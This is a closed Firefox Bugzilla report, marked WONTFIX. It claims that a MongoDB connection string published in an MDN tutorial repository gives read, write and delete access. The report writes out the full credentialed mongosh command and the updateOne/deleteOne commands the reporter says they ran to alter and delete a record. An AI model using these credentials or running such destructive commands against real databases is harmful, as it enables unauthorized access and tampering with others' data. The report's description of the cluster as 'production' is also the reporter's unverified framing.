Closed Bug 1960816 Opened 1 month ago Closed 23 days ago

Exposed MongoDB Credentials Allow Unauthenticated Access with Read/Write/Delete Privileges

Categories

(Firefox :: about:logins, defect)

Product:
Firefox
Component:
about:logins
Type:
defect

Tracking

()

Status:
RESOLVED WONTFIX

People

(Reporter: ammu424656, Unassigned)

Details

Attachments

(1 file)

mozilla1.png
113.81 KB, image/png
Details
Attached image mozilla1.png

Description: A publicly exposed MongoDB connection string allows full access to the database without authentication. Anyone can connect to the production database and:

  • Read sensitive collections (books, authors, pets, etc.).
  • Modify documents (updateOne successful).
  • Delete records (deleteOne successful).
  • Potentially perform privilege escalation if users or roles are stored.

The credentials (cooluser:coolpassword) which works for a live cluster.

Severity: CRITICAL

Vulnerable URL: https://github.com/mdn/express-locallibrary-tutorial/blob/4a9ef48a9a37f8d067c3101c47456977b4a04b93/populatedb.js

Steps to Reproduce:

  1. Navigate to the Vulnerable URL
  2. you will find the Mongo DB connecting string
  3. using mongosh, try to connect to the MongoDB shell:

mongosh "mongodb+srv://cooluser:coolpassword@cluster0.cojoign.mongodb.net/local_library?retryWrites=true&w=majority&appName=Cluster0"

  1. run the following commands below:
  • to update a document in the books collection, using title which exists in the collection:

db.books.updateOne({ title: "The Name of the Wind (The Kingkiller Chronicle, #1)" }, { $set: { title: "Modified Book" } });

  • to delete a document, use an existing title:

db.books.deleteOne({ title: "Modified Book" });

  1. Confirm Data After Modifications: this reflects the changes I made.

db.books.find().limit(5);

  1. I have successfully gained unauthorized read, write, and delete access to the production database.

Impact:

  • Full unauthorized access to the production database.
  • Potential business and data loss.
  • PII exposure if collections store user data.
  • High severity due to lack of auth, write/delete capabilities, and public availability of credentials.

Mitigation:

  • Rotate the username/password for cooluser on MongoDB Atlas.
  • Disable or delete the cooluser user if not needed.
  • Rotate credentials and purge commit history using BFG Repo-Cleaner or git filter-branch.

POC: I'm attaching the Screenshots for your perusal, please take a look at them...

Status: UNCONFIRMED → RESOLVED
Closed: 23 days ago
Resolution: --- → WONTFIX
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: